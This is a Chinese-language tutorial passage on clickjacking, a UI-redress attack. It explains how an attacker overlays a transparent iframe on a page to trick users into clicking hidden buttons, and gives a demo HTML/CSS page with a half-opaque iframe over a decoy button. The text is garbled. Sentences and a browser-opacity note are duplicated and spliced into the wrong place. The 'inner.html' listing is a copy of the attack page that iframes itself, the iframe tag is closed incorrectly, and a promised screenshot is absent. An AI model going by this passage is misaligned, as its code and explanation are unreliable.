点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe,覆盖在一
个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe
注意:IE使用私有的CSS属性,filter:alpha(opacity=50),0表示透明,100不透明
个网页上,然后诱使用户在该网页上进行操作,此时用户将在不知情的情况下点击透明的iframe
页面上的某个按钮或者链接。通过调整iframe 页面的位置,可以诱使用户恰好点击在iframe 页面的一些功能性按钮上。
一个简单的实例如下:
clickjacking.html代码
<style>
#click {
width: 100px;
height: 20px;
position: absolute;
left: 20px;
z-index: 1;
}
#hidden {
height: 50px;
position: absolute;
width: 120px;
filter: alpha(opacity=50);
opacity:0.5;
z-index: 2;
}
</style>
</head>
<body>
<input id="click" value="Click me" type="button"/>
<iframe id="hidden" src="inner.html" scrolling="no"> <iframe>
</body>
</html>
注意:IE使用私有的CSS属性,filter:alpha(opacity=50),0表示透明,100不透明
Chrome、Firefox、Opera等使用opacity:0.5 ,0表示透明
inner.html代码如下:
<style>
#click {
width: 100px;
height: 20px;
position: absolute;
left: 20px;
z-index: 1;
}
#hidden {
height: 50px;
position: absolute;
width: 120px;
filter: alpha(opacity=50);
opacity:0.5;
z-index: 2;
}
</style>
</head>
<body>
<input id="click" value="Click me" type="button"/>
<iframe id="hidden" src="inner.html" scrolling="no"> <iframe>
</body>
</html>
效果图如下: